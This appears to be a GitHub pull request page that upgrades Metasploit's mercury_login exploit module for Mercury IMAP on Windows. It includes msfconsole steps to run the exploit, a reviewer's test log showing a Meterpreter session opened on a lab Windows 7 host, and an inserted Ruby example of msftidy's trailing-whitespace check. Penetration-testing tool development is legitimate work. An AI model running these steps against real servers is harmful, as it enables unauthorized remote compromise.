
Upgraded exploit to work on any Windows target #10853

Merged
merged 17 commits into from Oct 28, 2018

Conversation

kr3bz

@kr3bz kr3bz commented Oct 23, 2018

In short, added an egghunter and the return address of the executable file itself, so it should work on any Windows system.

Also, upgraded to modern exploit module requirements.


Verification


  • Start msfconsole
  • use exploit/windows/imap/mercury_login
  • set RHOST x.x.x.x
  • exploit

bcoles and others added 5 commits October 23, 2018 14:32
Co-Authored-By: kr3bz <racic.ivan@gmail.com>
Co-Authored-By: kr3bz <racic.ivan@gmail.com>
Co-Authored-By: kr3bz <racic.ivan@gmail.com>
Co-Authored-By: kr3bz <racic.ivan@gmail.com>
Modified the script with recommendations.
@bcoles

bcoles commented Oct 23, 2018

Looks like msftidy is complaining as there's an extra space at the end of the 'Author' => line.

$ ./.git/hooks/post-merge
[*] Running msftidy.rb in ./.git/hooks/post-merge mode
--- Checking new and changed module syntax with tools/dev/msftidy.rb ---
modules/exploits/windows/imap/mercury_login.rb:22 - [WARNING] Spaces at EOL
------------------------------------------------------------------------
------------------------------------------------------------------------
[*] This merge contains modules failing msftidy.rb
[*] Please fix this if you intend to publish these
[*] modules to a popular metasploit-framework repo
------------------------------------------------------------------------
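The warning quoted above comes from msftidy's trailing-whitespace check. As an added example (not msftidy itself and not part of this pull request), the Ruby below re-implements that one check over a constructed module fragment whose 'Author' line carries a trailing space, reports it in the same "path:NN - [WARNING] Spaces at EOL" format, and strips the offending whitespace so the file would pass the hook. The module text and the file path are constructed for the example.

```ruby
# Added example: a minimal stand-in for the "Spaces at EOL" check in
# tools/dev/msftidy.rb, plus a fixer. Not msftidy's own code.

# Constructed sample: a Metasploit-style module header. The trailing space on
# the 'Author' line is appended explicitly so it survives editors that strip
# whitespace; it is the defect the msftidy hook flagged on this PR.
SAMPLE_LINES = [
  "class MetasploitModule < Msf::Exploit::Remote",
  "  Rank = GreatRanking",
  "",
  "  def initialize(info = {})",
  "    super(update_info(info,",
  "      'Name'    => 'Example Module',",
  "      'Author'  => [ 'someone' ]," + " ", # trailing space (the defect)
  "      'License' => MSF_LICENSE",
  "    ))",
  "  end",
  "end",
]
SAMPLE_MODULE = SAMPLE_LINES.join("\n") + "\n"

# Returns [[line_number, line_without_newline], ...] for every line that ends
# in a space or tab. Lines are numbered from 1 to match msftidy's "path:NN".
def eol_spaces(source)
  offences = []
  source.each_line.with_index(1) do |line, num|
    body = line.chomp
    offences << [num, body] if body.match?(/[ \t]+\z/)
  end
  offences
end

# Formats each offence the way the post-merge hook prints it.
def report(path, source)
  eol_spaces(source).map { |num, _| "#{path}:#{num} - [WARNING] Spaces at EOL" }
end

# Removes trailing spaces/tabs from every line. The lookahead keeps each
# line's own newline (or lack of one) exactly as it was.
def strip_eol_spaces(source)
  source.each_line.map { |line| line.sub(/[ \t]+(?=\n?\z)/, "") }.join
end

if __FILE__ == $PROGRAM_NAME
  path = "modules/exploits/windows/imap/example.rb" # hypothetical path
  puts report(path, SAMPLE_MODULE)
  fixed = strip_eol_spaces(SAMPLE_MODULE)
  puts "clean after fix: #{eol_spaces(fixed).empty?}"
end
```

Running the script prints one warning for line 7 of the sample and then confirms the stripped copy is clean; pointing `strip_eol_spaces` at a real module file before committing is the quickest way to keep the hook quiet.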

Added additional space for the payload, made recommended changes, msftidy does not produce errors, re-added null byte as a badchar.
@bcoles

bcoles commented Oct 28, 2018

I tried this out on 64-bit Windows, and it failed, although not surprising.

Tested successfully on:

  • 4.01a on Windows XP SP3 (x86)
  • 4.01a on Windows 7 SP1 (x86)
  • 4.01b on Windows 7 SP1 (x86)
msf5 exploit(windows/imap/mercury_login) > check
[+] 172.16.191.252:143 The target is vulnerable.
msf5 exploit(windows/imap/mercury_login) > run

[*] 172.16.191.252:143 - Sending payload (8931 bytes) ...
[*] Started bind TCP handler against 172.16.191.252:4444
[-] The connection timed out (172.16.191.252:4444).
[*] Sending stage (179779 bytes) to 172.16.191.252
[*] Meterpreter session 1 opened (172.16.191.138:53859 -> 172.16.191.252:4444) at 2018-10-28 03:20:10 -0400

meterpreter > getuid
Server username: WIN-PJARRFI1A3A\user
meterpreter > sysinfo
Computer        : WIN-PJARRFI1A3A
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > 

@bcoles bcoles self-assigned this Oct 28, 2018
bcoles and others added 2 commits October 28, 2018 09:41
Co-Authored-By: kr3bz <44395414+kr3bz@users.noreply.github.com>
Co-Authored-By: kr3bz <44395414+kr3bz@users.noreply.github.com>
@bcoles

bcoles commented Oct 28, 2018

Thanks. This looks good to me. I'll land this in the next couple days.

@bcoles bcoles merged commit 370bcaf into rapid7:master Oct 28, 2018
@bcoles bcoles added the rn-enhancement release notes enhancement label Oct 28, 2018
@bcoles

bcoles commented Oct 28, 2018

Release Notes

This adds an egghunter to exploit/windows/imap/mercury_login for automatic targeting of 32-bit Windows systems.

@kr3bz kr3bz deleted the mercury_imap_upgrades branch October 28, 2018 18:53